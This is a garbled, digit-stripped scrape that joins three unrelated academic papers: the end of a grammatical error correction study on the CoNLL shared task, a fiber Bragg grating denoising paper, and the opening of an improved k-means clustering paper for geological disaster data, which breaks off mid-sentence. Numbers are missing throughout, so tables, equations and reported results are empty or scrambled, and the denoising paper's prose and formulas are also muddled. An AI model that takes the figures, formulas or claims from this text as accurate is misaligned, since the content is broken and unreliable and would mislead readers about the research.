separately, we can also explore whether different errors benefit from different fea- tures; finiteness-based classifier (ii) optimizes fea- tures for each classifier. the differences in the fea- ture sets are minor and consist of removing several unigram word and pos features of tokens that do not appear immediately next to the verb. recall from the discussion on features that the agreement module can be further improved by adding syntactic knowl- edge. in the next section, it is shown that an even better approach is to train on learner data for agree- ment mistakes and on native data for form errors. the results in table are for ap models but sim- ilar improvements due to separate training are ob- served for nb models trained on web t. note that the nthu system also corrects all verb errors us- ing a model trained on web t but handles all these errors together; its verb module scored f points below the illinois one. while there are other differ- ences between the two systems, the results suggest that part of the improvement within the illinois sys- tem is indeed due to handling the two errors sepa- rately. . dim. : training data nucle is a large corpus produced by learners of the same language background as the test data. because of its large size, training on this corpus is a natural choice. indeed, many teams follow this approach. on the other hand, an important issue in the conll task is the difference between the training and test sets, which has impact on the selection of the train- ing set – the large web t has more coverage and allows for better generalization. we show that for some errors it is especially advantageous to train on a larger corpus of native data. it should be noted that while we refer to the web t corpus as “native”, it certainly contains data from language learners; we assume that the noise can be neglected. table compares models trained on native and learner data in their best configurations based on the training data. overall, we find that web t is clearly preferable for noun errors. we attribute this to the observation that noun number usage strongly depends on the surface form of the noun, and not just the contextual cues and syntactic structure. for example, certain nouns in english tend to be used exclusively in singular or plural form. thus, con- siderably more data compared to other error types is required to learn model parameters. on article and preposition errors, native-trained models perform slightly better on conll, while learner-trained models are better on fce. we con- error train. learning features f data algorithm conll fce art. native nb-adapt. n-gram . . learner ap-infl.* +pos+chunk . . prep. native lm; nb-adapt. n-gram . . learner ap-infl. n-gram . . noun native nb* n-gram . . learner ap-infl. +pos . . agr. native nb-adapt. n-gram . . learner ap-infl. +pos+syntax . . form native nb-adapt. n-gram . . learner ap-infl. +pos . . table : choice of training data: learner vs. native (web t). for prepositions, lm is chosen for conll, and nb- adapted for fce. modules that are part of the illinois submis- sion are marked with an asterisk. jecture that the fce training set is more similar to the respective test data and thus provides an advan- tage over training on native data. on verb agreement errors, native-trained models perform better than those trained on learner data, when the same n-gram features are used. however, when we add pos and syntactic knowledge, train- ing on learner data is advantageous. finally, for verb form errors, there is an advantage when training on a lot of native data, although the difference is not as substantial as for noun errors. this suggests that unlike agreement mistakes that are better addressed using syntax, form errors, similarly to nouns, benefit from training on a lot of data with n-gram features. to summarize, choice of the training data is an important consideration for building a robust sys- tem. researchers compared native- and learner- trained models for prepositions (han et al., ; cahill et al., ), while the analysis in this work addresses five error types – showing that errors be- have differently – and evaluates on two corpora. discussion in table , we show the results of the system, where the best modules are selected based on the performance on the training data. we also show the illinois modules (without post-processing). the fol- lowing changes are made with respect to the illinois submission: the preposition system is based on an lm and enhanced to handle spurious preposition er- rors (thus the illinois result of . shown here is for studies that directly combine native and learner data in training, see gamon ( ) and dahlmeier and ng ( ). error illinois submission this work model f model f art. ap-infl. . ap-infl. . prep. nb-adapt. . lm . noun nb . nb . agr. nb . ap-infl. . form nb . nb-adapt. . all . . table : results on conll of the illinois system (with- out post-processing) and this work. nb and lm models are trained on web t; ap models are trained on nucle. modules different from the illinois submission are in bold. different from the . in table ); the agreement classifier is trained on the learner data using ap with rich features and error inflation; the form classifier is adapted to learner mistakes, whereas the illinois submission trains nb without adaptation. the key improvements are observed with respect to least fre- quent errors, so the overall improvement is small. importantly, the illinois system already takes into account the four dimensions analyzed in this paper. in conll- , systems were compared using f . practical systems, however, should be tuned for good precision to guarantee that the overall qual- ity of the text does not go down. clearly, optimiz- ing for f does not ensure that the system improves the quality of the text (see appendix b). a differ- ent evaluation metric based on the accuracy of the data is proposed in rozovskaya and roth ( b). for further discussion of evaluation metrics, see also wagner ( ) and chodorow et al. ( ). it is also worth noting that the obtained results underestimate the performance because the agree- ment on what constitutes a mistake can be quite low (madnani et al., ), so providing alternative cor- rections is important. the revised annotations ad- dress this problem. the illinois system improves its f from . to . on revised annotations. however, these numbers are still an underestimation because the analysis typically eliminates precision errors but not recall errors. this is not specific to conll: an error analysis of the false positives in clc that includes the fce showed an increase in precision from % to % and % to % for preposition and article errors (gamon, ). an error analysis of the training data also al- lows us to determine prominent groups of system errors and identify areas for potential improvement, which we outline below. cascading nlp errors: in the example below, the illinois system incorrectly changes “need” to “needs” as it considers “victim” to be the subject of that verb: “also, not only the kid- nappers and the victim needs to be tracked down, but also jailbreakers.” errors in interacting linguis- tic structures: the illinois system considers every word independently and thus cannot handle interact- ing phenomena. in the example below, the article and the noun number classifiers propose corrections that result in an ungrammatical structure “such a sit- uations”: “in such situation, individuals will lose their basic privacy.” this problem is addressed via global models (rozovskaya and roth, ) and re- sults in an improvement over the illinois system. er- rors due to limited context: the illinois system does not consider context beyond sentence level. in the example below, the system incorrectly proposes to delete “the” but the wider context indicates that the definite article is more appropriate here: “we have to admit that how to prevent the abuse and how to use it reasonably depend on a sound legal system, and it means surveillance has its own restriction.” conclusion we identified key design principles in developing a state-of-the-art error correction system. we did this through analysis of the top system in the conll- shared task along several dimensions. the key dimensions that we identified and analyzed con- cern the choice of a learning algorithm, adaptation to learner mistakes, linguistic knowledge, and the choice of the training data. we showed that the de- cisions in each case depend both on the type of a mistake and the specific setting, e.g. how much an- notated learner data is available. furthermore, we provided points of comparison with other systems along these four dimensions. acknowledgments we thank peter chew and the anonymous reviewers for the feedback. most of this work was done while the first author was at the university of illinois. this material is based on re- search sponsored by darpa under agreement number fa - - - and by the army research laboratory (arl) under agreement w nf- - - . any opinions, findings, con- clusions or recommendations are those of the authors and do not necessarily reflect the view of the agencies. references g. berend, v. vincze, s. zarrieß, and r. farkas. . lfg-based features for noun number and article gram- matical errors. in proceedings of conll: shared task. t. brants and a. franz. . web t -gram version . linguistic data consortium. a. cahill, n. madnani, j. tetreault, and d. napolitano. . robust systems for preposition error correction using wikipedia revisions. in proceedings of naacl. s. chen and j. goodman. . an empirical study of smoothing techniques for language modeling. in pro- ceedings of acl. m. chodorow, m. dickinson, r. israel, and j. tetreault. . problems in evaluating grammatical error de- tection systems. in proceedings of coling. d. dahlmeier and h. t. ng. . grammatical error correction with alternating structure optimization. in proceedings of acl. d. dahlmeier and h.t ng. . a beam-search decoder for grammatical error correction. in proceedings of emnlp-conll. d. dahlmeier, h.t. ng, and s.m. wu. . build- ing a large annotated corpus of learner english: the nus corpus of learner english. in proceedings of the naacl workshop on innovative use of nlp for build- ing educational applications. r. dale and a. kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the th european workshop on natural language gen- eration. r. dale, i. anisimoff, and g. narroway. . a re- port on the preposition and determiner error correction shared task. in proceedings of the naacl workshop on innovative use of nlp for building educational applications. y. even-zohar and d. roth. . a sequential model for multi class classification. in proceedings of emnlp. j. foster and Ø. andersen. . generrate: generating errors for use in grammatical error detection. in pro- ceedings of the naacl workshop on innovative use of nlp for building educational applications. j. foster. . treebanks gone bad: generating a tree- bank of ungrammatical english. in proceedings of the ijcai workshop on analytics for noisy unstructures data. y. freund and r. e. schapire. . experiments with a new boosting algorithm. in proceedings of the th international conference on machine learning. m. gamon. . using mostly native data to correct errors in learners’ writing. in proceedings of naacl. s. gass and l. selinker. . language transfer in language learning. john benjamins. n. han, m. chodorow, and c. leacock. . detecting errors in english article usage by non-native speakers. journal of natural language engineering, ( ): – . n. han, j. tetreault, s. lee, and j. ha. . us- ing an error-annotated learner corpus to develop and esl/efl error correction system. in proceedings of lrec. t. ionin, m.l. zubizarreta, and s. bautista. . sources of linguistic knowledge in the second lan- guage acquisition of english articles. lingua, : – . e. izumi, k. uchimoto, t. saiga, t. supnithi, and h. isa- hara. . automatic error detection in the japanese learners’ english spoken data. in proceedings of acl. t.-h. kao, y.-w. chang, h.-w. chiu, t-.h. yen, j. bois- son, j.-c. wu, and j.s. chang. . conll- shared task: grammatical error correction nthu sys- tem description. in proceedings of conll: shared task. d. klein and c. d. manning. . fast exact inference with a factored model for natural language parsing. in proceedings of nips. c. leacock, m. chodorow, m. gamon, and j. tetreault. . automated grammatical error detection for language learners. morgan and claypool publish- ers. j. lee and s. seneff. . correcting misuse of verb forms. in proceedings of acl. n. madnani, m. chodorow, j. tetreault, and a. ro- zovskaya. . they can help: using crowdsourcing to improve the evaluation of grammatical error detec- tion systems. in proceedings of acl. m. marneffe, b. maccartney, and ch. manning. . generating typed dependency parses from phrase structure parses. in proceedings of lrec. h. t. ng, s. m. wu, y. wu, ch. hadiwinoto, and j. tetreault. . the conll- shared task on grammatical error correction. in proceedings of conll: shared task. h. t. ng, s. m. wu, t. briscoe, c. hadiwinoto, r. h. su- santo, and c. bryant. . the conll- shared task on grammatical error correction. in proceedings of conll: shared task. v. punyakanok and d. roth. . the use of classifiers in sequential inference. in proceedings of nips. a. radford. . transformational grammar. cam- bridge university press. n. rizzolo and d. roth. . learning based java for rapid development of nlp systems. in proceedings of lrec. a. rozovskaya and d. roth. a. annotating esl errors: challenges and rewards. in proceedings of the naacl workshop on innovative use of nlp for build- ing educational applications. a. rozovskaya and d. roth. b. training paradigms for correcting errors in grammar and usage. in pro- ceedings of naacl. a. rozovskaya and d. roth. . algorithm selec- tion and model adaptation for esl correction tasks. in proceedings of acl. a. rozovskaya and d. roth. . joint learning and in- ference for grammatical error correction. in proceed- ings of emnlp. a. rozovskaya, m. sammons, j. gioja, and d. roth. . university of illinois system in hoo text cor- rection shared task. in proceedings of the european workshop on natural language generation (enlg). a. rozovskaya, m. sammons, and d. roth. . the ui system in the hoo shared task on error cor- rection. in proceedings of the naacl workshop on innovative use of nlp for building educational ap- plications. a. rozovskaya, k.-w. chang, m. sammons, and d. roth. . the university of illinois system in the conll- shared task. in proceedings of conll shared task. a. rozovskaya, k.-w. chang, m. sammons, d. roth, and n. habash. a. the university of illinois and columbia system in the conll- shared task. in proceedings of conll shared task. a. rozovskaya, d. roth, and v. srikumar. b. cor- recting grammatical verb errors. in proceedings of eacl. a. stolcke. . srilm-an extensible language model- ing toolkit. in proceedings of international confer- ence on spoken language processing. j. tetreault, j. foster, and m. chodorow. . using parse features for preposition selection and error de- tection. in proceedings of acl. j. wagner. . detecting grammatical errors with treebank-induced, probabilistic parsers. ph.d. the- sis. y. xiang, b. yuan, y. zhang, x. wang, w. zheng, and c. wei. . a hybrid model for grammatical error correction. in proceedings of conll: shared task. j. xing, l. wang, d.f. wong, l.s. chao, and x. zeng. . um-checker: a hybrid system for english grammatical error correction. in proceedings of conll: shared task. h. yannakoudakis, t. briscoe, and b. medlock. . a new dataset and method for automatically grading esol texts. in proceedings of acl. i. yoshimoto, t. kose, k. mitsuzawa, k. sakaguchi, t. mizumoto, y. hayashibe, m. komachi, and y. mat- sumoto. . naist at conll grammat- ical error correction shared task. in proceedings of conll: shared task. appendix a features and additional information about the data classifier art. prep. noun agr. form train k k k k k test k k k k k table a. : number of candidate words by classifier type in training and test data (fce). error number of errors and error rate train test art. ( . %) ( . %) prep. ( . %) ( . %) noun ( . %) ( . %) verb agr. ( . %) ( . %) verb form ( . %) ( . %) table a. : statistics on annotated errors in the fce cor- pus. percentage denotes the error rates, i.e. the number of er- roneous instances with respect to the total number of relevant instances in the data. features description ( ) subjhead, subjpos the surface form and the pos tag of the subject head ( ) subjdet determiner of the subject np ( ) subjdistance distance between the verb and the subject head ( ) subjnumber sing – singular pro- nouns and nouns; pl – plural pronouns and nouns ( ) subjperson rdsing – “she”, “he”, “it”, singular nouns; not rdsing – “we”, “you”, “they”, plural nouns; stsing – “i” ( ) conjunctions ( )&( ); ( )&( ) table a. : verb agreement features that use syntactic knowledge. appendix b evaluation metrics here, we discuss the conll- shared task eval- uation metric and provide a little bit more detail on p r e c is io n recall article prep noun agreement form figure : precision/recall curves by error type. the performance of the illinois modules in this con- text. as shown in table in sec. , over % of words (about % in training) are used correctly. the low error rates are the key reason the error cor- rection task is so difficult: it is quite challenging for a system to improve over a writer that already per- forms at the level of over %. indeed, very few nlp tasks already have systems that perform at that level. the error sparsity makes it very challenging to identify mistakes accurately. in fact, the highest precision of . %, as calculated by the shared task evaluation metric, is achieved by the illinois system. however, once the precision drops below %, the system introduces more mistakes than it identifies. we can look at individual modules and see whether for any type of mistake the system improves the quality of the text. fig. shows preci- sion/recall curves for the system in table . it is interesting to note that performance varies widely by error type. the easiest are noun and article usage errors: for nouns, we can do pretty well at the recall point % (with the corresponding precision of over %); for articles, the precision is around % at the recall value of %. for agreement errors, we can get a precision of % with a very high threshold (identifying only % of mistakes). fi- nally, on two mistakes – preposition and verb form – the system never achieves a precision over %. feature type feature group features word n- gram wb, w b, w b, wa, w a, w a, wbwa, w bwb, waw a, w bw bwb, w bwbwa, wbwaw a, waw aw a, w bw bw bwb, w bw bwbwa, w bwbwaw a, wbwaw aw a, waw aw w a pos pb, p b, p b, pa, p a, p a, pbpa, p bpb, pap a, pbwb, pawa, p bw b, p aw a, p bpbpa, pbpap a, pap ap a chunk np headword, npwords, nc, adj&headword, adjtag&headword, adj&nc, adjtag&nc, nptags&headword, nptags&nc np headword&headpos, headnumber wordsafternp headword&wordafternp, npwords&wordafternp, headword& wordsafternp, npwords& wordsafternp, headword& wordsafternp, npwords& wordsafternp wordbeforenp wb&fi ∀i ∈ np verb verb, verb&fi ∀i ∈ np preposition prep&fi ∀i ∈ np table a. : features used in the article error correction system. wb and wa denote the word immediately before and after the target, respectively; and pb and pa denote the pos tag before and after the target. headword denotes the head of the np complement. nc stands for noun compound and is active if second to last word in the np is tagged as a noun. verb features are active if the np is the direct object of a verb. preposition features are active if the np is immediately preceded by a preposition. adj feature is active if the first word (or the second word preceded by an adverb) in the np is an adjective. npwords and nptags denote all words (pos tags) in the np. international journal of advanced network, monitoring and controls volume , no. , research on noise removal in fiber grating sensing signal xiaobo zhou * xijing university, xi’an, china e-mail: @qq.com abstract—signal processing is one of the key technology of fiber grating sensor, noise interference on signal transmission, influence of fiber grating sensor practical application effect, in order to solve the noise problem of fiber grating sensing signal, design a denoising method of fiber grating sensing signal based on improved contourlet transform. the acquisition of fiber grating sensing signal firstly, and remove the unwanted signal, select the useful signal, then using contourlet transform, by filtering the noise filter, finally through the concrete experiment to test the effect of denoising. the results show that the improved contourlet transform can completely remove the fiber bragg grating sensing signals, and improve the quality of fbg sensor communication, and verify the effectiveness of the proposed method. keywords-fiber grating; sensing signal; noise interference; contourlet transform; filter i. introduction with the continuous development of optical communication technology, fiber grating sensing technology obtained the unprecedented development of fiber bragg grating sensor with strong ability of resisting electromagnetic interference resistance to corrosion, high sensitivity, small body low cost advantages, has the incomparable advantages of traditional sensors, in the national defense military aerospace and other fields has been widely used in [ - ] in the practical application of fiber bragg grating sensor and sensing signal is very susceptible to noise interference, the measurement precision of the fiber bragg grating sensor is affected, so to remove the noise of the fiber bragg grating sensor research has the vital significance. at home and abroad in recent years, some studies mechanism of fiber bragg grating sensor signal denoising studies [ , ], but the study also not enough in-depth the earliest using fourier transform to deal with the noise of the fiber bragg grating sensor signal, in order to improve the quality of the fiber bragg grating sensor signals, but as a result of the fourier transform of signal decomposition scale is coarser, cannot effectively eliminate the noise of the fiber bragg grating sensor signal [ - ] in order to solve the limitations of fourier transform, some scholars wavelet transform denoising method was adopted to realize fbg sensing signal quality of ascension, the decomposition scale is more detailed, more thoroughly remove noise, but the algorithm of wavelet threshold denoising process, the threshold selection is critical, whether hard or soft threshold threshold was adopted to realize, the current disagreed on threshold selection criteria, and the implementation process is very complicated, not easy to operation. outline of the wavelet transform is a method of multi-scale decomposition can effective denoising signal in noise, in order to solve the problem of the current fiber bragg grating sensor signal noise, design a fiber bragg grating sensor based on contour wavelet transform signal denoising method, the experimental results, improve the outline of the wavelet transform can eliminate noise in the fiber bragg grating sensor signals, won the high quality of the grating sensor signal. ii. working principle of fiber grating sensing fiber bragg grating sensor is a kind of wavelength modulated sensor. as the wavelength is a constant, it is not affected by the optical fiber loss and energy of the light source, so its performance is better than other types of fiber sensor. its working principle is shown in figure . doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , figure . workingprinciple of fiber grating sensing appens, reflection wavelength will have corresponding change, so that we can according to the detection wavelength to be the measured value of the fiber grating, such as temperature and pressure center wavelength drift (  ) and the relationship between the longitudinal strain (  ) can be described as ( )b e b p         / e p dn d n   denotes the elastic modulus. the relationship between the center wavelength drift (  ) and temperature change ( t ) of the fbg can be described as ( )b t b t          t  and  respectively represent the coefficient of thermal expansion and the coefficient of thermal light. the relationship between the center wavelength drift (  ) and pressure change ( p ) of the fiber bragg grating is ( ) n n p n p n p                      let e be the elastic modulus of the fiber bragg grating, and the formula for calculating the refractive index change of the fiber bragg grating is ( )l v p l e     ( )( ) n n p v n e        in the process of fiber bragg grating sensing, the refractive index is related to many factors, especially the interference of noise is the biggest, which brings adverse effects to the measurement results such as temperature and pressure. for this reason, contour transformation is introduced in this paper to carry out denoising processing on the fiber bragg grating sensing signal, so as to improve the measurement accuracy such as temperature and pressure. iii. the method of raster sensing signal denoising by contourlettransform a. contourlet transform aiming at the limitation of the wavelet transform, some scholars raised the outline of the wavelet transform, this method can from two aspects of measure frequency, by the signal processing has a certain direction, make the effective signal to concentrate for a signal containing noise, outline of the wavelet transform of the original signal by base structure approaching, outline of the wavelet transform at the same time also has a certain anisotropic characteristics through the laplacian pyramid to multi-scale decomposition of noise signal, find some of the specific signal and noise, through the direction of the filter to filter noise operation, after denoising international journal of advanced network, monitoring and controls volume , no. , signal firstly, the fiber bragg grating sensor signal is sampled and the low frequency information of the fiber bragg grating sensor signal is obtained. then, the fiber bragg grating sensor signal is sampled, and the high frequency information of the fiber bragg grating sensor signal is obtained. in figure , x represents the fiber bragg grating sensor signal, and h g is a low-pass filter. h ¯m m g - x a b + h ¯m m g+- x a b + (a) decomposition of fiber bragg grating signals (b) reconstruction of fiber bragg grating signals figure . diagram of decomposition and reconstruction of fiber bragg grating signals the process of three-level directional subband division of direction filter is shown in figure . the sub-bands of the upper level are sampled by resampling operator and the sampling results are output. figure . subband division of direction filter b. the de-noising principle of fiber bragg grating (fbg) sensor in contour wave transform as the useful fbg sensor signal and noise show different characteristics in contour wave transformation, the fbg sensor signal is transformed in different levels, and the noise in the fbg sensor signal is removed according to the appropriate threshold value. set the original fiber bragg grating sensor signal  ( ); , , ,g x x n  ,signal with noise fiber grating sensor  ( ) ( ) ( ); , , ,f x g x n x x n    ,where, the mean value of noise is , the variance is  , and the formula for calculating the standard deviation of each layer is , , , ( ( ) ) ˆ ( ) . f j j median w j j     ( ) f w j means the decomposition coefficient of the ( )f x jth layer. c. selection of threshold value of signal denoising by fiber bragg grating sensor there are many threshold selection methods for contour wave transformation. due to the universal and easy implementation of the universe threshold method, this paper selects the universe threshold method to determine the threshold of the optical fiber grating sensor signal denoising, and the high-frequency sub-band threshold of the universe threshold method is determined as follows ( ) ( ) lg( ( ) * ( ))th j j m j n j  where, ( ) * ( )m j n j represents the number of contour wave decomposition coefficients of j layer. ( ) * ( )m j n j ,the larger the size, the denoising threshold will set the high frequency coefficient of the decomposition result of the fiber bragg grating sensor to . in this way, a large number of useful fiber bragg grating sensor signals will be removed. therefore, equation ( ) will be corrected as follows ( ) ( ) ( ) * ( ) th j th j m j n j   d. the process of signal denoising by fiber bragg grating sensor step : contour wave transform is performed on signal f(x) of fiber bragg grating sensor with noise. the coefficients of contour transform domain are as follows: ( ( )) _ _w ct f x ct f ct n    step : according to the denoising rules, the contour transformation coefficient ( ŵ ) of the original image g(x) is international journal of advanced network, monitoring and controls volume , no. , obtained by applying the denoising rules to the original optical fiber grating sensor signal w. the denoising rules are as follows: , ( ) ˆ , ( ) w if w th j w if w th j       step : perform contour wave reconstruction and transformation on the estimated value ŵ of contour wave transform coefficient, and obtain the signal of fiber bragg grating sensing '( )g x after de-noising. ˆ( )g x ct w    iv. test and analysis of thedenoising effect of fiber bragg grating sensor a. the signal of fiber grating sensor withnoise in order to analyze the denoising effect of the fiber bragg grating sensing signal of contour wave transform, matlab was used as the test platform to conduct the denoisingexperiment. the signal of fiber grating sensor with noise is shown in figure . figure . the signal of fiber grating sensor with noise b. results and analysis ) the denoising effect of this paper. contour wave transform is used to de-noising the signal-sensing signal of the fiber bragg grating containing noise in figure . the signal-sensing signal of the fiber bragg grating after de-noising is shown in figure . as can be seen from figure , contour wave transform can remove the noise in the fiber bragg grating sensing signal very well and improve the quality of the fiber bragg grating sensing signal. it is an effective method to remove noise from the fiber bragg grating sensing signal. figure . the denoising results of fiber bragg grating sensor in contour wave transform ) performance comparison with current classical methods. in order to test the advantage of contour wave transform in denoising, wavelet transform [ ] and literature [ ] were used for comparison experiments, and peak signal to noise ratio (psnr) and root mean square error (mse)[ ] were used to evaluate the result of signal de-noising of fiber bragg grating sensor. psnr and mse of fiber bragg grating sensor after de-noising were shown in table . can be seen from table , the outline of the fiber bragg grating sensor signals after wavelet transform denoising psnr, said fiber bragg grating sensor signal quality is better, noise removal more thoroughly, and contrast methods cannot completely eliminate the noise in the fiber bragg grating sensor signals effectively, the interferences with fiber bragg grating sensor measurement accuracy, mse is far less than contrast method at the same time, said contour wavelet transform denoising results more stable, and the method of denoising time is shorter, can satisfy the mass of fiber bragg grating sensor signal denoising practical application requirements. table.i. compares the performance of the classical raster sensing signal de-noising method denoising method psnr mse the wavelet transform . . the literature[ ] . . contour wave transform . . v. summary serious impact on the quality of the fiber bragg grating signal noise, its application scope and bring certain actual application value of interference, in order to eliminate the adverse effect, was proposed based on wavelet transform outline of fiber grating sensing signal denoising method, according to outline the multi-scale wavelet transform and directional advantages, the fiber bragg grating sensor signal decomposition, found in the decomposition of the signal noise data, and through the corresponding filter to remove noise, and through the inverse operation outline of the wavelet transform denoising signal after refactoring, improves the signal-to-noise ratio of the fiber bragg grating sensor signals, and compared with other denoising method has carried on the experiment. the contrast method can international journal of advanced network, monitoring and controls volume , no. , remove some useful signals while removing noise, while the method in this paper may keep the useful signal as much as possible, and at the same time improve the real-time performance of the fiber bragg grating sensing signal. acknowledgement xijing university scientific research foundation project(xj ). references [ ] l li ,a j xia : the advantages and applications of fiber bragg grating sensing technology [j]. optical communication technology, ( ): - . [ ] k.w. zhang, s.w. zhang and s. x.zhao: application of fiber bragg grating strain sensor in bridge structure monitoring [j]. optical instrument, , ( ): - . [ ] a.q. li, g.d.zhou: research progress and prospect of optical fiber bragg sensor testing technology [j]. journal of southeast university (natural science edition), , ( ): - . [ ] jeanno f, joel c, john b: low energy impact damage monitoring of composites using dynamic strain signals from fbg sensors-part ii: damage identification [j]. composite structures, , : - . [ ] z. q.lin, h. yang and h.s. chen: temperature compensation of fiber grating strain sensor [j]. journal of southeast university (natural science edition), , ( ): - . [ ] c.xning, s.s. zhang :experimental study on temperature compensation of fiber grating [j]. journal of hebei university of science and technology, , ( ): - . [ ] p.x.zheng, y.l. song and d.s. zhang: experimental study on temperature and strain sensing characteristics of fiber bragg grating [j]. instrument technology and sensor, , ( ): - . [ ] x.f. zhou,l.liang: experimental study on stability of fiber bragg grating sensor [j]. sensor and microsystem, , ( ): - . [ ] loutas t h, kostopoulos v, ramirez-jimenez c, et al: damage evolution in center-holed glass/polyester composites under quasi-static loading using time/frequency analysis of acoustic emission monitored waveforms [j]. composite science and technology, , : - . [ ] l.q.hou,x.f.zhao;z.p.leng andt.sun :improved calculation value of temperature compensation of fiber bragg grating strain sensor [j]. journal of sensor technology, , ( ): - . [ ] j.p.li, x.l.zeng and j.w. guan: study on refractive index sensing of fiber bragg grating [j]. laser and infrared, , ( ): - . [ ] hampshire t a, adelih.:monitoring the behavior of steel structures using distributed optical fiber sensors. journal of constructional steel research, , ( ): - . [ ] hill k o, fujii y, johnson d c, et al. photosensitivity in optical fiber waveguides: application to reflection filter fabrication[j]. applied physics letters, , ( ): - . [ ] j. zhou, t.g.ning: study on demodulation of fiber bragg grating sensing signals [j]. optical communication technology, , : - . [ ] x.lyu, z.b.zhang and y. qu: study on curved long-period photonic crystal fiber grating sensing [j]. laser technology, , ( ): - . [ ] j. j.cao, l.l.hu and r. zhao: an optical fiber grating sensing signal de-noising method that improves the wavelet threshold function [j]. journal of sensing technology, , ( ): - . [ ] y. p.wang, l.l.hu and b.wang: optical fiber grating sensing signal de-noising based on digital filtering and its fpga implementation [j]. journal of xi 'an university of technology, , ( ): - . [ ] l. liu,m. yu and r.j. yang:wavelet de-noising for optical fiber raman temperature sensing system [j]. china laser, , ( ): - . international journal of advanced network monitoring and controls volume , no. , improved k-means algorithm based on optimizing initial cluster centers and its application xue linyao, wang jianguo school of computer science and engineering, xi’an technological university, xi’an, china email: xuelinyaoyao@foxmail.com abstract. data mining is a process of data grouping or partitioning from the large and complex data, and the clustering analysis is an important research field in data mining. the k-means algorithm is considered to be the most important unsupervised machine learning method in clustering, which can divide all the data into k subclasses that are very different from each other. by constantly iterating, the distance between each data object and the center of its subclass is minimized. because k-means algorithm is simple and efficient, it is applied to data mining, knowledge discovery and other fields. however, the algorithm has its inherent shortcomings, such as the k value in the k-means algorithm needs to be given in advance; clustering results are highly dependent on the selection of initial clustering centers and so on. in order to adapt to the historical data clustering of the geological disaster monitoring system, this paper presents a method to optimize the initial clustering center and the method of isolating points. the experimental results show that the improved k-means algorithm is better than the traditional clustering in terms of accuracy and stability, and the experimental results are closer to the actual data distribution. keywords: clustering analysis, improved k-means algorithm, geological disaster monitoring data . introduction the occurrence of geological disasters caused great casualties to humans, the main reasons include landslides and debris flow and rainfall and so on. and these geological disasters always cause many local public facilities to be damaged by large and small, and brought great damage to the people and their property. also, there are still many such cases in china. faced with such a severe threat of geological disasters, the state and the government on the prevention and control of geological disasters into a lot of human and material resources, and achieved remarkable results. with the progress of technology and high development of information technology, many new detection equipments have been put into the geological disaster real-time detection, such as gps, secondary sound wave monitoring, radar and so on. with the development of geological hazard detection technology, the amount of the monitoring data grew by leaps and bounds, data types are becoming more and more complex as well. k-means algorithm is a clustering algorithm based on the classification of the classic algorithm, the algorithm in the industrial and commercial applications more widely. as we all know, it both has many advantages and many disadvantages. the research on the deficiency of k-means algorithm is divided into two branches: ) the international journal of advanced network monitoring and controls volume , no. , number of initial clustering centers k; ) the choice of initial clustering center. in this paper, we mainly study the latter, and propose a new initial clustering center algorithm. the data source of the study is the historical data detected by the geological disaster monitoring system, and records are randomly selected from the rainfall data of different areas in shaanxi province as the research object, which are served as a representative sample of the improved k-means clustering algorithm. the experimental results show that the algorithm is better than the traditional clustering in terms of accuracy and stability, and the experimental results are closer to the actual data distribution. . brief and research status of k-means algorithm . overview of k-means algorithm the k-means algorithm is a classical unsupervised clustering algorithm. the purpose is to divide a given data set containing n objects into k clusters so that the objects in the cluster are as similar as possible, and the objects between clusters are as similar as possible. set the sample set x = {x , x , x , ... xn}, n is the number of samples. the idea of the k-means algorithm is: firstly, k data objects are randomly selected from the sample set x as the initial clustering center; secondly, according to the degree of similarity between each data object and k clustering centers, it is allocated to the most similar clusters; then recalculate the average of each new cluster and use it as the next iteration of the clustering center, and repeat the process until the updated cluster center is consistent with the update, that is, the criterion function e converges. figure. k-means flow the goal is to make the object similarity in the cluster the largest, and the similarity between the objects is the smallest. the degree of similarity between the data can be determined by calculating the euclidean distance between the data. for the n-dimensional real vector space, the euclidean distance of two points is defined as: improved k-means algorithm based on optimizing initial cluster centers and its application d(x, y)= ( ) here, x_i and y_i are the attribute values of x and y respectively, and the criterion function is defined as: e = ( ) here, k is the total number of clusters, and is the center of cluster c. the flow of k-means algorithm is shown in figure . . research status quo of k-means algorithm for the advantages of k-means algorithm, it has been widely used in practice, but there are many shortcomings as well. in order to get better clustering effect, many researchers have explored the shortcomings of improving k-means. aiming at the shortcomings of k-means algorithm in selecting the initial point, many scholars have proposed an improved method. duan guiqin [ ] uses the method of product based on mean and maximum distance to optimize the initial clustering center. the algorithm first selects the set of data objects which are the farthest from the sample set to join the clustering center, and then the set of mean and current poly the largest data object of the class center is added to the clustering center set, which improves the accuracy. yi baolin [ ] et al. proposed another improved k-means algorithm, which first calculates the density of the region to which the data object belongs, and then selects k points as the initial center in the high density region. the experimental results show that the algorithm reduces the initial center point impact. yiu-ming cheng[ ] and others proposed a new clustering technique called k * -means algorithm. the algorithm consists of two separate steps. a center point is provided for each cluster in the first step; and then adjust the unit through adaptive learning rules in the second step. the algorithm overcomes the shortcomings of k-means algorithm initial center sensitivity and k value blindness, but the calculation is complicated. xie and others [ ] proposed a k-means algorithm to optimize the initial clustering center by using the minimum variance based on the sample space distribution compactness information. the algorithm chooses the samples with the smallest variance and a distance away from each other as the initial clustering center. liu jiaxing et al.[ ] proposed a radius-based k-means + λ algorithm. when selecting the initial center point of the cluster, the distance ratio between points is calculated from the λ parameter and rounded at a specific distance. in the circle, an initialized center point is selected according to the distance ratio, and the algorithm has higher performance in error rate and operation time. ren jiangtao[ ] proposed an improved k-means algorithm for text clustering, which is improved by using feature selection and dimension reduction, sparse vector selection, initial center point search based on density and spreading, class accuracy, stability and other aspects have improved. . the analysis of shortcomings of k-means algorithm ) the k value in the k-means algorithm needs to be given in advance. according to the k value determined in advance, the clustering samples are classified into k class, so that the sum of squares of all the samples in the clustering domain to the clustering center is minimized. ) clustering results are highly dependent on the selection of initial clustering centers. the k-means algorithm uses the stochastic method to select the initial clustering center. if the initial clustering center is chosen improperly, it is difficult to obtain the ideal clustering effect. this dependence on the initial value may lead to the instability of the clustering results, and it is easy to fall into the local optimal rather than the global optimal results. international journal of advanced network monitoring and controls volume , no. , ) sensitive to noise and isolated points. . improvement of k-means algorithm and its application . the selection of data object in cluster analysis the preliminary data are collected firstly when data selecting, then know about the characteristics of data to identify the quality of the data and to find a basic observation of the data or assume the implied information to monitor the subset of data of interest. the data object segmentation variable determines the formation of clustering, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clustering clusters after the new data objects are added. before the k-means clustering related data mining, the sample data set related to the data mining clustering analysis should be extracted from the original data object set, and it is not necessary to use all the historical data. in addition, we should pay attention to the quality of data, only high-quality data to the correct analysis of conclusions everywhere, to 